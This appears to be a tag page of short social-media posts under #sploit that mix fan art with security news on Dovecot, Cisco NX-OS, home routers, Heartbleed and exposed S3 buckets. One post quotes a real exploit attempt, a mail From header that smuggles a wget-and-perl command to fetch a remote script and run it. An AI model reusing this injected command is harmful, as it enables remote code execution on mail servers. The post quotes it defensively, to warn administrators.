Discover Top Posts Tagged with #sploit

Grub Right Grub Right

The doodles under the cut include an image of an actual caterpillar, just in case those make anyone uncomfortable

#realizing i havent introduced sploit yet #or i dont think i have at least #right #cammie #sploit #skibidi toilet #skibidi tag #skibidi oc #skibidi toilet ocs #skibidi fanart #skibidi toilet tag #skibidi toilet oc

Jess Franco Friday!

#lust for frankenstein #whaaa #sploit #ouch #comic #photo comic #draculina #fumetti #lina romay #jess franco #jess franco friday #franco friday #grindhousecellar

labs - Vulnerability Labs for security analysis

https://github.com/nixawk/labs/blob/master/CVE-2017-8464/wp-cpl-malware.pdf

https://github.com/nixawk/labs/blob/master/CVE-2017-8464/%5BMS-SHLLINK%5D-160714.pdf

#sec #security #ms #msft #win32 #exploit #poc #lnk #vuln #sploit #opdf #pdf #mal #malware #explit #exploit-dv #CVE-2017-8464/%5BMS-SHLLINK%5D-160714.pd #shell #link #trend #micro

https://twitter.com/FredericJacobs/status/455365268240228353/photo/1/large

#embarrassing #belgium #heartbleed #data breach #sploit #pwnt

by Joel Esler (Version: 1)

One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this:

From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@example.com

(Obviously edited for your safety, and I didn't post the whole thing.)

This is an exploit against Dovecot that is using the feature "use_shell" against itself. This feature, unfortunately, is found in the example wiki on Dovecot's website, and also in their example configuration. We'd caution anyone that is using Dovecot to take a look at their configuration and make use they aren't using the "use_shell" parameter. Or if you are, make darn sure you know what you are doing, and how to defend yourself.

#Dovecot #Exim #sysadmin #mail servers #sploit

The network hardware specialist Cisco has issued a security advisory that documents a number of security vulnerabilities in Cisco NX-OS, which should be fixed by updates. Cisco NX-OS is an operating system for network components optimised for high availability. Among the affected devices are the Nexus range of data centre switches, the Cisco 6100/6200 switches in Cisco's Unified Computing server fabric, the MDS 9000 series of multilayer switches for storage area networks, and the Cisco 1000 series connected grid router, designed for use in energy, gas and water supply.

#cisco #vulns #scada #sploit #nx-os

;;; probably just an ad for this organization since there is scant details in this piece and I can’t be assed to dig deeper, but here you go: =-=-=+ IDG News Service - Thirteen popular home and small office routers contain security problems that could allow a hacker to snoop or modify network traffic, according to new research. Independent Security Evaluators (ISE), a security consultancy based in Baltimore, found that all of the routers they tested could be taken over if the hacker had access credentials. The tested products came from Linksys, Belkin, Netgear, Verizon and D-Link. All of the router models evaluated ran their company’s latest firmware and were tested with their default, out-of-the-box configurations. Consumers have few options for mitigating the attacks, ISE said in its report. “Successful mitigation often requires a level of sophistication and skill beyond that of the average user,” ISE said. +=-=-= ;;; still probably not nearly as bad as the last couple of pieces I posted about routers though. this is why running stock firmware is bad! bad bad bad.

#routers #malware #cyber security #sploit #sploits #vulns #vuln

With companies flocking to cloud services such as Amazon Simple Storage Service (S3) to store and serve static content on the cheap, naturally they’re making simple mistakes in doing so—and naturally, a savvy attacker is able to cash in.

Researchers at Rapid7 today released data from a project looking at the availability and security of files and other objects on Amazon S3. Businesses, generally small businesses, for example can store anything from backups to log files, static website images, and documents inside logical containers known as buckets. By default, the buckets are set to private, meaning that only certain users may list or download the objects stored in the bucket. Both the objects and the bucket can be password-protected. Public buckets, on the other hand, allow any user to view the contents. A company could also store private files inside a public bucket.

As it turns out, most users leave the default private setting. But Rapid7 security researcher Will Vandevanter, using information from HD Moore’s Critical.IO Project, the Bing Search API and a list of Fortune 1000 company names, found 12,328 buckets belonging to enterprises, and 1,951 of those had been reset to public exposing more than 126 billion files.

#cloud computing #amazon #S3 #AWS #sploit #cyber security #cybersecurity #dumb #big data

#sploit

Trending Tags

Recently Viewed Tags

#sploit